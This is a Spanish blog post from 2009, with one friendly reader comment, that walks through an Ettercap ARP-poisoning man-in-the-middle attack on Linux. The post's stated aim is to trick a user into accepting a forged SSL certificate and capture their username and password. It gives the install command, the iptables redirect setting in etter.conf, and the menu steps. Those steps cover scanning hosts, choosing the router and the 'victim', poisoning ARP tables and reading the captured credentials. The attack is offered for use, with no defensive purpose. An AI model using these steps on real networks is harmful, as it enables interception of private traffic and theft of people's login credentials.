Por fin puedo hacer lo que hasta la fecha solo sabía hacer con Caín bajo Windows. Se trata de Ettercap, ya hablé de esta herramienta en una anterior ocasión, pero esta vez la cosa va mas allá, vamos a engañar al usuario para que acepte un certificado falso y así poder sacar su nombre de usuario y su password.
Primero instalamos la aplicación:
apt-get install ettercap
Ahora configuramos Ettercap para que sea capaz de tratar con SSL, editamos el fichero /etc/etter.conf
vi /etc/etter.conf
Descomentamos la línea:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Ahora entramos en modo consola como root:
ettercap -C
Nos dirigimos al menú Sniff --> Unified Sniffing
Buscamos los Hosts de nuestra red:
Hosts -->Scan for Hosts
Listamos los Hosts encontrados:
Hosts-->Host List
Presionamos 1 para la IP del Router y 2 para la IP de la víctima.
Empezamos el envenenamiento de las tablas ARP:
MITM-->ARP Poisoning
En parameters escribimos remote
Empezamos el ataque:
Start-->Start Sniffing
En la parte inferior "User Messages" podremos ver el usuario y su correspondiente password.
Dejo una captura de un usuario imaginario accediendo a Gmail:
lunes, enero 05, 2009
Suscribirse a:
Enviar comentarios (Atom)
1 comentario:
loco, que hacia tiempo que no me pasaba por aqui.
veo que sigue adelante y que empiezas a despegar. ole, sigue asi tio. un abrazo!!
Publicar un comentario